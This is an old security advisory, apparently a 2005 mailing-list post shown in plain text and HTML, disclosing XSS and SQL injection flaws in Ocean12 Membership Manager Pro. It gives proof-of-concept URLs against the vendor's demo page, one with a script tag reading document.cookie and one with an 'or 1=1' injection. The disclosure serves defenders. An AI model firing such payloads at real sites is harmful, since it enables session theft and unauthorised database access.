Ocean12 Membership Manager Pro has XSS and SQL injection vulnerabilities with a high risk. Vendor not responded to contact
`Content-type: Multipart/Alternative; boundary="Alt-Boundary-17843.14003556"
--Alt-Boundary-17843.14003556
Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory
Title: Ocean12 Membership Manager Pro : XSS and Sql injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner
to easily add password protected areas to their website"
xss
http://www.ocean12scripts.com/products/membership/demo/main.asp?
UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s
cript%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
SQL INJECTION
http://www.ocean12scripts.com/products/membership/demo/main.asp?
UserID=0 or
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
The vendor has been contacted more than a month ago. No response
received.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp
zinho-no-spam @ hackerscenter.com
====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting
--Alt-Boundary-17843.14003556
<?xml version="1.0" ?><html>
<head>
<title></title>
</head>
<body>
<div align="left"><font face="Arial"><span style="font-size:10pt">Hackers Center Security Group (</span></font><font face="Arial" color="#0000ff"><span style="font-size:10pt"><u>http://www.hackerscenter.com/</u>)</span></font><font
face="Arial"><span style="font-size:10pt"> </span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Zinho's Security Advisory </span></font></div>
<div align="left"><br/>
</div>
<div align="left"><br/>
</div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Title: Ocean12 Membership Manager Pro : XSS and Sql injection</span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Risk: High </span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Date: 5/04/2005 </span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Vendor: </span></font><font face="Arial" color="#008000"><span style="font-size:10pt"><u>http://www.ocean12scripts.com</u></span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">"A membership manager application designed to allow a website owner
to easily add password protected areas to their website"</span></font></div>
<div align="left"><br/>
</div>
<div align="left"><br/>
</div>
<div align="left"><font face="Arial"><span style="font-size:10pt">xss</span></font></div>
<div align="left"><br/>
</div>
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10</span></font></div>
<div align="left"><br/>
</div>
<div align="left"><font face="Arial"><span style="font-size:10pt">SQL INJECTION</span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10</span></font></div>
<div align="left"><br/>
</div>
<div align="left"><br/>
</div>
<div align="left"><font face="Arial"><span style="font-size:10pt">The vendor has been contacted more than a month ago. No response
received.</span></font></div>
<div align="left"><br/>
</div>
<div align="left"><br/></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Author: </span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Zinho is webmaster and founder of </span></font><font face="Arial" color="#008000"><span style="font-size:10pt"><u>http://www.hackerscenter.com</u></span></font><font
face="Arial"><span style="font-size:10pt"> ,
Security research portal </span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Secure Web Hosting Companies Reviewed: </span></font></div>
<div align="left"><font face="Arial" color="#008000"><span style="font-size:10pt"><u>http://www.securityforge.com/web-hosting/secure-web-hosting.asp</u></span></font><font face="Arial"><span
style="font-size:10pt"> </span></font></div>
<div align="left"><br/></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">zinho-no-spam @ hackerscenter.com </span></font></div>
<div align="left"><br/></div>
<div align="left"><br/>
</div>
<div align="left"><font face="Arial"><span style="font-size:10pt">====></span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">Webmaster of</span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">.:[ Hackers Center : Internet Security Portal]:.</span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.hackerscenter.com</span></font></div>
<div align="left"><font face="Arial"><span style="font-size:10pt">http://www.securityforge.com/web-hosting</span></font></div>
<div align="left"><br/>
</div>
<div align="left"></div>
</body>
</html>
--Alt-Boundary-17843.14003556--
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo